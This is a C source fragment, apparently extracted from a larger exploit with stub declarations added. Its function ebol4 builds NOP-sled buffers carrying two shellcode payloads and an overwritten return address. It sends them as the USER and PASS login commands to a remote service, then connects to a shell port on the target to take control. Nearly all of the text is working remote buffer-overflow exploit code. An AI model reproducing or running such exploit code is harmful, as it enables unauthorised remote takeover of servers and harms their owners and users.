
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int rcv ;
typedef int buf2 ;
typedef int buf1 ;


 int SHELL ;
 int close (int ) ;
 scalar_t__ connection (char*,int) ;
 scalar_t__ debug ;
 int fdsocket ;
 int fprintf (int ,char*,...) ;
 int getchar () ;
 int memcpy (char*,char*,int ) ;
 int memset (char*,int,int) ;
 int owned (int ) ;
 int recv (int ,char*,int,int) ;
 char* shellcode_1 ;
 char* shellcode_2 ;
 int sprintf (char*,char*,char*) ;
 int stdout ;
 int strlen (char*) ;
 int warning (char*) ;
 int write (int ,char*,int ) ;

int ebol4 (char *target, int port, int ret, int align)
{
 int i;
 char snd[1024]="", rcv[1024]="";
 char buf1[92], buf2[101];

 int *ebol = (int *)(buf2 + align);

 if (connection(target, port))
  warning ("\n _(0x666)_  Error in connecting to server\n");
 else
  fprintf (stdout, " _(0x1)_  Connected (!)\n");


 memset ((char *)buf1, 0x90, sizeof(buf1));
 memcpy ((char *)buf1, shellcode_1, strlen(shellcode_1));

 memset ((char *)buf2, 0x90, sizeof(buf2));
 for (i=0; i<15; i+=4, *ebol++ = ret);

 memcpy ((char *)buf2+15+12, shellcode_2, strlen(shellcode_2));

 recv (fdsocket, rcv, sizeof(rcv), 0x0);

 if (debug)
  fprintf (stdout, "\n <debug> server resp. : %s\n", rcv);

 fprintf (stdout, " _(0x2)_  Sending USER (shellcode_1)\n");

 sprintf (snd, "USER %s\n", buf1);
 write (fdsocket, snd, strlen(snd));
 recv (fdsocket, rcv, sizeof(rcv), 0x0);

 if (debug)
 {
  fprintf (stdout, " <debug> [w8ing ...] run gdb then press [ENTER]\n");
  getchar();
 }

 fprintf (stdout, " _(0x3)_  Sending PASS (shellcode_2)\n\n");

 sprintf (snd, "PASS %s\n", buf2);
 write (fdsocket, snd, strlen(snd));
 recv (fdsocket, rcv, sizeof(rcv), 0x0);

 if (debug)
  fprintf (stdout, " <debug> server resp. : %s\n", rcv);

 close (fdsocket);

 if (!(connection(target, SHELL)))
  owned(fdsocket);
 else
  return 0x666;

 return 0x333;
}
